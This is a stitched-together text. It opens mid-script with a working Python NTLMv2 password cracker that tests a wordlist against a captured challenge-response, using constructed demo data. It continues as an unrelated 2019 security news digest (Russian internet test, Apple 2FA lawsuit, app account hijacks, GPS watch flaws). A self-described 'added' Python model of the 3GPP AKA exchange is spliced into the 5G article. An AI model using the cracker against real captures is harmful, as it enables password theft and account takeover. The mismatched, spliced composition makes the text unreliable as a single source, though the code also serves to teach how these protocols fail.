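    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_response(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# --- constructed demonstration data (not a real capture) ---
USER, DOMAIN = "alice", "CORP"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")          # chosen by the attacker's server
BLOB = (b"\x01\x01" + b"\x00" * 6                             # blob signature + reserved
        + bytes.fromhex("00a0c1d2e3f4d501")                   # timestamp (constructed)
        + bytes.fromhex("8899aabbccddeeff")                   # client nonce (constructed)
        + b"\x00" * 4
        + b"\x02\x00\x08\x00" + "CORP".encode("utf-16-le")    # AvPair: NetBIOS domain name
        + b"\x00" * 4)                                        # AvPair terminator (MsvAvEOL)
VICTIM_PASSWORD = "Spring2019!"                               # constructed
WORDLIST = ["password", "Welcome1", "Spring2019!", "letmein"]

CAPTURE = capture_line(USER, DOMAIN, SERVER_CHALLENGE, BLOB,
                       ntlmv2_response(VICTIM_PASSWORD, USER, DOMAIN, SERVER_CHALLENGE, BLOB))

if __name__ == "__main__":
    print("captured: ", CAPTURE)
    print("recovered:", crack(CAPTURE, WORDLIST))
```

Note that what leaks is the response, not the NT hash itself: the attacker cannot log in with it directly, but because the challenge was theirs and the client blob is sent in the clear, every candidate password can be tested offline at HMAC-MD5 speed. The other well-known use of a captured exchange, relaying it live to a third server, is not shown here.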


February 12, 2019 »

Russian ISPs plan internet disconnection test for entire country

By John E Dunn

At a time and date during 2019 yet to be confirmed, Russia’s major ISPs will in unison temporarily disconnect their servers from the internet, effectively cutting the country off from the outside world.

From the point of view of Russian internet users, everything will appear normal – as long as they are connecting to websites hosted in Russia, which will still work. Anything beyond its borders will suddenly become unavailable, presumably with a message telling them why. It’s not clear how long the test disconnection will go on for.

According to a translated report by Russian news agency RosBiznesKonsalting (RBK), the aim will be to test the feasibility of a concept dubbed the “sovereign RuNet”, or the Russian Internet.

A draft law proposing such a thing reached Russia’s parliament in December, since when the implications of the test disconnection, however temporary, have dawned on nervous local ISPs.

ISPs want more money to help with the test, as well as guarantees they won’t be saddled with the bill to implement a separate proposed system of control in which internet traffic will be routed via the country’s telecom regulator, Roskomnadzor.


Apple sued for ‘forcing’ 2FA on accounts

By Lisa Vaas

New York resident Jay Brodsky has filed a class action lawsuit against Apple, claiming that the company forces users into a two-factor authentication (2FA) straitjacket that they can’t shrug off, that it takes up to five minutes each time users have to enter a 2FA code, and that the time suck is causing “economic losses” to him and other Apple customers.

The lawsuit, filed on Friday in Newport Beach, California, is accusing Apple of “trespass,” based on Apple’s “locking [Brodsky] out” of his devices by requiring 2FA that allegedly can’t be disabled after two weeks.

From the filing:

Plaintiff and millions of similarly situated consumers across the nation have been and continue to suffer harm. Plaintiff and Class Members have suffered economic losses in terms of the interference with the use of their personal devices and waste of their personal time in using additional time for simple logging in.

The reference to two weeks comes from support email that Apple sometimes sends out to Apple ID owners after it enables 2FA. That email contains what the lawsuit claims, with italicized emphasis, is an unobtrusive last line that says that owners have two weeks to opt out of 2FA and go back to their previous security settings.


Kids as young as eight falling victim to online predators

By Maria Varmazis

Barnardo’s, a major children’s charity in the UK, has found that children as young as eight are being sexually exploited online via social media. In prior years, the youngest respondents to the Barnardo’s survey were 10, suggesting an unfortunate downward trend in progress.

The newest draw for young children, and sadly those who prey on them, is live streaming. Barnardo’s says that video streaming apps like TikTok, as well as streaming within already-popular apps like Instagram, are both extremely popular and very hard to moderate. When you add in the real-time comments posted directly to the person streaming, unfortunately you have an environment that’s ripe for exploitation.

Just last year, Barnardo’s ran a survey via YouGov in the UK and found 57% of 12-year-olds surveyed and 28% of 10-year-olds had live-streamed content on apps that are supposed to be used only by over-13s. In addition, about a quarter of the 10 to 16-year-olds surveyed said they regretted something they had posted online via live streaming.

Barnardo’s Chief Executive Javed Khan:

It’s vital that parents get to know and understand the technology their children are using and make sure they have appropriate security settings in place. They should also talk to their children about sex and relationships and the possible risks and dangers online so children feel able to confide in them if something doesn’t feel right.

Contrary to some popular opinion on the subject, Barnardo’s says that based on the children they have helped, there’s no typical profile of a child who tends to fall victim to sexual exploitation online. The stereotype of the child from a troubled home being a ripe target for exploitation online doesn’t appear to hold true.


Brave browser explains Facebook whitelist to concerned users

By Danny Bradbury

Privacy-conscious web browser company Brave was busy trying to correct the record this week after someone posted what looked like a whitelist in its code allowing its browser to communicate with Facebook from third-party websites.

Launched in 2016, Brave is a browser that stakes its business model on user privacy. Instead of just serving up user browsing data to advertisers, its developers designed it to put control in the users’ hands. Rather than allowing advertisers to track its users, the browser blocks ad trackers and instead leaves users’ browsing data encrypted on their machines. It then gives users the option to receive ads by signaling basic information about their intentions to advertisers, but only with user permission. It rewards users for this with an Ethereum blockchain-based token called the Basic Attention Token (BAT). Users can also credit publishers that they like with the tokens.


Facebook defends gun-law loophole firm as “political advertisers”

By Lisa Vaas

A gun safety group has criticized Facebook for taking what The Telegraph reports is millions of dollars in advertising money to sell permits to carry concealed weapons to people who lack real-life training in handling firearms.

The Telegraph quoted David Chipman, a senior policy adviser at the Giffords Law Center to Prevent Gun Violence as well as a former SWAT team officer who has a concealed carry permit:

A company has choices to make, to look if it’s in the interests of their company to support people carrying guns that haven’t been trained to use them.

I would just want [Facebook] to make that decision with eyes wide open. You don’t get that training by answering multiple guess questions on the internet.

Facebook’s records reportedly show that the platform has taken in at least $3.7 million since May, advertising what’s called the “Virginia loophole”.

The Virginia loophole

Virginia, a gun-friendly state, allows people from other states to take an online class, pay a $100 fee and, after a background check, get a concealed “non-resident” carry license.

As local Texas station WFAA reported in May 2018, some other US states will honor the Virginia non-resident license, in spite of applicants never having to show that they know how to load a gun or shoot safely.


Crypto mirror on the wall, who’s the smartest of them all?

By Paul Ducklin

A recent BBC TV series entitled Icons asked the question, “Who was the greatest person of the 20th century?”

That’s a huge and controversial question in any country, in any language, in any category – and, as you can imagine, the answer’s even bigger, and no doubt even more controversial.

There were seven categories: Artists & Writers, Sports Stars, Activists, Entertainers, Scientists, Explorers and Leaders.

The nominees had to be both important and influential – people whom you’d recognise not only for being top in their field, but also for the significance of what they did.

For example (these are off the top of our head): George Orwell, Jesse Owens, Mohandas Gandhi, Dame Vera Lynn, Rosalind Franklin, Sir Edmund Hillary and Nelson Mandela.

In fact, only one of the people listed above made the final seven…

…and didn’t win.


McDonalds app users hatin’ it after being hacked by hungry hamburglars

By Danny Bradbury

At least two users of the McDonalds mobile app aren’t lovin’ it after thieves hijacked their accounts and ordered hundreds of dollars of food for themselves.

Lauren Taylor of Halifax, Nova Scotia was shocked to find her bank account almost empty after someone used the McDonald’s mobile app to buy $500 of fast food over 1200 kilometers away in Montreal, Quebec.

The crook managed to compromise her account to run up the bills in a five-day period from 25-29 January. Every time the hungry hijacker scored a Big Mac and fries, a receipt showed up in her inbox. Unfortunately, she doesn’t check her email that regularly. By the time she did, she had just $1.99 left. She explained that she had to find rent, and presumably someone in Montreal had to find a larger pair of pants with an elasticated waist.

After ordering food through the McDonalds app, customers can check in when they reach the restaurant. The app then charges the debit card that they registered onto the system, and a member of staff will deliver it to them curbside. To get the food, the customer has to provide a four-digit code given to them by the app.

McDonalds Canada denied that there was a security problem with the app in an email to Canada’s CBC. A spokesperson said:

We take appropriate measures to keep personal information secure, including on our app. Just like any other online activity, we recommend that our guests use our app diligently by not sharing their passwords with others, creating unique passwords and changing passwords frequently.

Taylor claims that she did, though, arguing that she changes her passwords regularly, never shares them, and keeps them strong. The McDonalds app requires passwords to be eight to 12 characters long, with upper and lowercase characters and at least one number.


February 7, 2019 »

Jack’d dating app is showing users’ intimate pics to strangers

By Lisa Vaas

Dating/hook-up app Jack’d is publicly sharing, without permission, photos that users think they’re sharing privately.

The Android version of the app has been downloaded 110,562 times from Google’s Play store, and it’s also available on iOS.

Jack’d is designed to help gay, bi and curious guys to connect, chat, share, and meet on a worldwide basis. That includes enabling them to swap private and public photos.

But as it turns out, what should be its “private” photos… aren’t.

Unfortunately, as the Register reported on Tuesday, anyone with a web browser who knows where to look can access any Jack’d user’s photos, be they private or public – all without authentication or even the need to sign in to the app. Nor are there any limits in place: anyone can download the entire image database for whatever mischief they want to get into, be it blackmail or outing somebody in a country where homosexuality is illegal and/or gays are harassed.

The finding comes from researcher Oliver Hough, who told the Register that he reported the security bug to the Jack’d programming team three months ago. Whoever’s behind the app hasn’t yet supplied a fix for the security glitch, which the Register has confirmed.


Firefox 66 will silence autoplaying web audio

By John E Dunn

Quieter web browsing is finally within reach for users of Mozilla’s Firefox.

It’s been on the to-do list for a while, but a new blog by the company has confirmed that from Firefox 66 for desktop and Firefox for Android, due on 19 March, media autoplay of video or audio will be blocked on websites by default.

According to Mozilla’s developer blog, this means:

We only allow a site to play audio or video aloud via the HTMLMediaElement API once a web page has had user interaction to initiate the audio, such as the user clicking on a ‘play’ button.

Until the user does something to initiate a video or audio stream, the only thing that will be possible is muted autoplay.

If you find it annoying when videos start of their own accord, this will come as welcome news. But what about use cases where autoplay is desirable?

Currently, it is possible to achieve autoplay blocking by toggling a setting from about:config (type that into your Firefox address bar), but that is a global setting and is either on or off.

Under the new regime, there are several options: allowing autoplay once on a website, white-listing websites so that autoplay is always allowed from them, or always allowing or always blocking autoplay for all websites.


Just two hacker groups are behind 60% of stolen cryptocurrency

By Danny Bradbury

We may not know the names of those who steal cryptocurrency from online exchanges, but we now know that most of the thefts are down to just two groups – and one of them isn’t even in it for the money alone.

A new report from blockchain investigation company Chainalysis reveals that just two criminal groups are responsible for around 60% of all cryptocurrency stolen from exchanges.

Cryptocurrency exchanges are prime targets for cybercriminals. People trading Bitcoin and other virtual currencies do so using exchanges, and many tend to leave their funds in their accounts on those exchanges rather than withdrawing them to a secure account under their control. This makes it more convenient for them to make trades quickly without having to keep redepositing funds.

Large amounts of these funds often reside in an exchange’s hot wallet, which is connected to the blockchain and therefore online. It makes exchanges prime targets for online attacks. Chainalysis, which uses forensic techniques to find connections between cryptocurrency addresses, analysed some of those thefts to find out where the funds ended up. They may not know who owns the addresses, but using its forensic techniques it can determine whether the addresses are owned by the same people.

In its Crypto Crime Report, released last week, Chainalysis found that two groups, which it calls Alpha and Beta, were responsible for stealing around $1 billion in funds from exchanges.


Digital signs left wide open with default password

By Lisa Vaas

Security researcher Drew Green has pried open an internet-connected digital signage system thanks to a default password on its admin web interface: an easily changeable password that let him into the web interface, from where he stumbled onto a chain of vulnerabilities that could allow a malicious attacker to upload whatever unsavoury content they liked to people’s signage screens.

On Friday, 90 days after Green says he disclosed the vulnerabilities to the digital signage system maker, he published the specifics.

He had pulled apart the signage system for a client during a full-scope penetration test, and this system happened to be on the network. He couldn’t find anything else to dig into, so Green sunk his hooks into the signage system, named Carousel, which comes from Tightrope Media Systems (TRMS) and which his client was running on a TRMS-supplied device that Green says is “essentially an x86 Windows 10 PC.”

As Green understands it, his client had a television in the lobby that was hooked up to the system in order to display information about the company: for example, when interns graduated college; names and pictures of new hires; and awards the company had received. The systems can also play audio, videos, or images: a good way to give customers their first impression when they’re visiting your company.

Or, on the other hand, a good way to sear visitors’ eyeballs if a hacker figures out how to upload whatever unsavories they like.


February 5, 2019 »

Home DNA kit company says it’s working with the FBI

By Lisa Vaas

FamilyTreeDNA – one of the larger makers of at-home genealogy test kits – has disclosed that it’s quietly been giving the FBI access to its database of 1 million DNA profiles to help solve violent crime.

Investigators’ use of public genealogy databases is nothing new: law enforcement agencies have been using them for years. But the power of online genealogy databases to help track down and identify people became clear in April 2018, when police arrested Joseph James DeAngelo on suspicion of being the Golden State Killer: the man allegedly responsible for more than 50 rapes, 12 murders and more than 120 burglaries across the state of California during the 70s and 80s.

What’s new about FamilyTreeDNA’s cooperation with the FBI – as reported by BuzzFeed News on Thursday – is that it’s the first time that a private genealogy company has publicly admitted to voluntarily letting a law enforcement agency access its database.

A spokesperson for FamilyTreeDNA told BuzzFeed that the company hasn’t signed a contract with the FBI. But it has agreed to use its private lab to test DNA samples at the bureau’s request, and to upload the profiles to its database, on a case-by-case basis. It’s been doing so since this past autumn, according to BuzzFeed.

The spokesperson said that working with the FBI is “a very new development” that started with one case last year and “morphed.” At this point, she said, the company has cooperated with the FBI on fewer than 10 cases.


Half of IoT devices let down by vulnerable apps

By John E Dunn

Testing Internet of Things (IoT) devices for security weaknesses can often resemble a large fist punching a wet paper bag. Researchers report a litany of firmware vulnerabilities, insecure wireless communications, and consumer complacency about the risks of connecting smart devices to a home network.

With so much bad press, might things be improving?

Not as fast as they should be, according to a test by researchers from Brazil’s Federal University of Pernambuco and the University of Michigan, who took a closer look at 32 smartphone apps used to configure and control the 96 top-selling Wi-Fi and Bluetooth-enabled devices sold on Amazon.

There’s a lot for IoT makers to secure, including the apps themselves, their connection to cloud proxies (typically used during initial setup), and the subsequent wireless connection and authentication to and from the IoT device.

It’s also a lot of equipment to test, which is why the researchers in this study started by inferring potential weaknesses using heuristic analysis of the apps themselves.

Disappointingly, 31% of the apps (corresponding to 37 devices out of 96) had no encryption at all while another 19% had hard-coded encryption keys an attacker might be able to reverse engineer even if they’d been obfuscated.


Crypto exchange in limbo after founder dies with password

By Danny Bradbury

Customers of Canadian cryptocurrency exchange QuadrigaCX are missing over $250 million CAD in fiat and virtual currency (a total of around $190m in US dollars) after its founder died without telling anyone the password for his storage wallet.

QuadrigaCX enabled users to trade between fiat currency and cryptocurrencies including Bitcoin, Bitcoin Cash, Litecoin and Ethereum.

Gerry Cotten, the 30-year-old founder of the Vancouver-based exchange, passed away in India on 9 December 2018 due to complications from Crohn’s disease. In an affidavit to the Supreme Court of Nova Scotia, his partner Jennifer Robertson explained that cryptocurrencies had been stored in a cold wallet under his sole control.

In cryptocurrency trading, a wallet is a repository for cryptocurrency addresses that contain assets, along with private keys to access them. There are two kinds of wallet: hot, and cold.

A hot wallet is a software program connected to a blockchain, enabling it to make cryptocurrency transactions. A hot wallet can be vulnerable to hacking via software compromise.

A cold wallet stores address and private key details off the blockchain. It can take several forms. A paper wallet stores the details in writing, while a hardware wallet stores addresses and keys in a device. A cold storage wallet could even be a simple text file containing the appropriate addresses and keys. It can still be physically stolen, but because it isn’t connected to a blockchain it isn’t vulnerable to online compromise.


Kids’ GPS watches are still a security ‘train wreck’

By Lisa Vaas

A year after Norwegian researchers found that child-tracking, GPS-connected smartwatches had major security flaws – flaws that would have let strangers eavesdrop on a child, talk to them behind their parent’s back, use the watch’s camera to take their picture, stalk them, or lie about their whereabouts – not much has changed.

When Pen Test Partners decided to check up on how one of the four models the Norwegian researchers looked at had shaped up over the course of 14 months, things turned out to be status quo: the security of TechSixtyFour’s Gator watch and thousands of other watches was still a train wreck.

Pen Test Partners’ TL;DR:

Guess what: a train wreck. Anyone could access the entire database, including real time child location, name, parents details etc. Not just Gator watches either – the same back end covered multiple brands and tens of thousands of watches

Following the Norwegian Consumer Council’s (NCC’s) 2017 report about these Internet-of-Things (IoT) wrist wraps, bad press broke out like so much prepubescent acne. At least one UK retailer, John Lewis, responded by yanking the Gator 2.

In November 2018, TechSixtyFour founder Colleen Wong said on the company’s blog that it had responded to the NCC’s report with a complete, one-month-long system overhaul. It also hired a vulnerability assessment firm to review its systems on an ongoing, monthly basis.


Security weaknesses in 5G, 4G and 3G could expose users’ locations

By John E Dunn

Fifth generation (5G) wireless test networks are barely in the ground and already researchers say they’ve uncovered new weaknesses in the protocol meant to secure it.

5G security is built around 5G AKA (Authentication and Key Agreement), an enhanced version of the AKA protocol already used by 3G and 4G networks.

A big issue this was supposed to address was the ease with which surveillance of 3G and 4G devices can be carried out using fake base stations known as IMSI catchers (International Mobile Subscriber Identity-catcher, sometimes called ‘StingRays’).

Disappointingly, according to a research paper, New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols, made public late last year, 5G AKA might not solve this thanks to deeper issues with the AKA protocol on which it is based.
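To show what the AKA exchange that 5G AKA builds on actually looks like on the wire, here is an added Python model of it (example code, not from the article or from the paper). Both sides’ messages are shown: the home network issues RAND, AUTN and XRES; the USIM unmasks the sequence number, checks the MAC, checks freshness and answers with RES, or with one of the two distinct failure responses the 3GPP specification defines, MAC failure and synchronisation failure. The functions f1..f5 are HMAC-SHA256 stand-ins rather than MILENAGE or TUAK, the key K, RAND and sequence numbers are constructed, and session-key derivation (CK/IK) is left out.

```python
"""
Simplified 3GPP AKA (Authentication and Key Agreement) exchange between a home
network and a USIM. Added example; not code from the article or the cited
paper. f1..f5 are HMAC-SHA256 stand-ins, not MILENAGE or TUAK; K, the sequence
numbers and RAND are constructed. CK/IK derivation is omitted.
"""
import hashlib
import hmac
import os

AMF = b"\x80\x00"              # authentication management field (constructed value)
SQN_LEN, MAC_LEN = 6, 8


def _prf(K: bytes, label: bytes, *parts: bytes) -> bytes:
    return hmac.new(K, label + b"".join(parts), hashlib.sha256).digest()


def f1(K, rand, sqn, amf):  return _prf(K, b"f1", rand, sqn, amf)[:MAC_LEN]   # MAC-A
def f1_star(K, rand, sqn):  return _prf(K, b"f1*", rand, sqn)[:MAC_LEN]       # MAC-S (resync)
def f2(K, rand):            return _prf(K, b"f2", rand)[:8]                    # RES / XRES
def f5(K, rand):            return _prf(K, b"f5", rand)[:SQN_LEN]              # AK, masks SQN in AUTN
def f5_star(K, rand):       return _prf(K, b"f5*", rand)[:SQN_LEN]             # AK*, masks SQN_MS in AUTS


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class HomeNetwork:
    def __init__(self, K: bytes, sqn: int = 0):
        self.K, self.sqn = K, sqn

    def authentication_vector(self, rand: bytes = None):
        """Fresh challenge: RAND, AUTN = (SQN xor AK) || AMF || MAC-A, and XRES."""
        rand = rand or os.urandom(16)
        self.sqn += 1
        sqn = self.sqn.to_bytes(SQN_LEN, "big")
        autn = xor(sqn, f5(self.K, rand)) + AMF + f1(self.K, rand, sqn, AMF)
        return rand, autn, f2(self.K, rand)

    def verify(self, res: bytes, xres: bytes) -> bool:
        return hmac.compare_digest(res, xres)

    def resynchronise(self, rand: bytes, auts: bytes) -> bool:
        """Recover SQN_MS from AUTS, but only adopt it if MAC-S checks out."""
        sqn_ms = xor(auts[:SQN_LEN], f5_star(self.K, rand))
        if not hmac.compare_digest(auts[SQN_LEN:], f1_star(self.K, rand, sqn_ms)):
            return False
        self.sqn = int.from_bytes(sqn_ms, "big")
        return True


class USIM:
    DELTA = 32    # largest forward SQN jump the card accepts (constructed bound)

    def __init__(self, K: bytes, sqn_ms: int = 0):
        self.K, self.sqn_ms = K, sqn_ms

    def challenge(self, rand: bytes, autn: bytes):
        """Returns ('OK', RES), ('MAC_FAILURE', None) or ('SYNC_FAILURE', AUTS).
        The MAC is checked first, so an AUTN never issued by the home network is
        rejected before the sequence number is even looked at."""
        sqn = xor(autn[:SQN_LEN], f5(self.K, rand))
        amf, mac = autn[SQN_LEN:SQN_LEN + 2], autn[SQN_LEN + 2:]
        if not hmac.compare_digest(mac, f1(self.K, rand, sqn, amf)):
            return "MAC_FAILURE", None
        n = int.from_bytes(sqn, "big")
        if not self.sqn_ms < n <= self.sqn_ms + self.DELTA:
            sqn_ms = self.sqn_ms.to_bytes(SQN_LEN, "big")
            auts = xor(sqn_ms, f5_star(self.K, rand)) + f1_star(self.K, rand, sqn_ms)
            return "SYNC_FAILURE", auts
        self.sqn_ms = n
        return "OK", f2(self.K, rand)


def run_exchange(K: bytes = b"\x2b" * 16):
    """A good run, then a replay of the same challenge, then a tampered AUTN."""
    hn, usim = HomeNetwork(K), USIM(K)
    rand, autn, xres = hn.authentication_vector()
    status, res = usim.challenge(rand, autn)
    outcomes = {"fresh": status, "verified": hn.verify(res, xres) if res else False}
    outcomes["replay"], auts = usim.challenge(rand, autn)          # same RAND/AUTN again
    outcomes["resync"] = hn.resynchronise(rand, auts)
    tampered = autn[:-1] + bytes([autn[-1] ^ 0x01])
    outcomes["tampered"], _ = usim.challenge(rand, tampered)
    return outcomes


if __name__ == "__main__":
    for step, result in run_exchange().items():
        print("%-9s %s" % (step, result))
```

The point to notice is that a replayed but genuine challenge and a forged one are answered differently, and that the resynchronisation path hands the network an AUTS from which it recovers the card’s own counter; both are behaviour the specification requires, and a real USIM runs MILENAGE or TUAK over a K that never leaves the card.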

As the name suggests, IMSI catchers work by tricking devices into connecting to them instead of the real base station, exploiting the fact that under GSM (the Global System for Mobile Communication mobile phone standard), devices prioritize closer and stronger signals.

Luring a smartphone to connect to a fake base gives attackers the power to identify the device’s owner, track their physical location, and potentially execute a downgrade attack by asking it to remove security such as encryption.

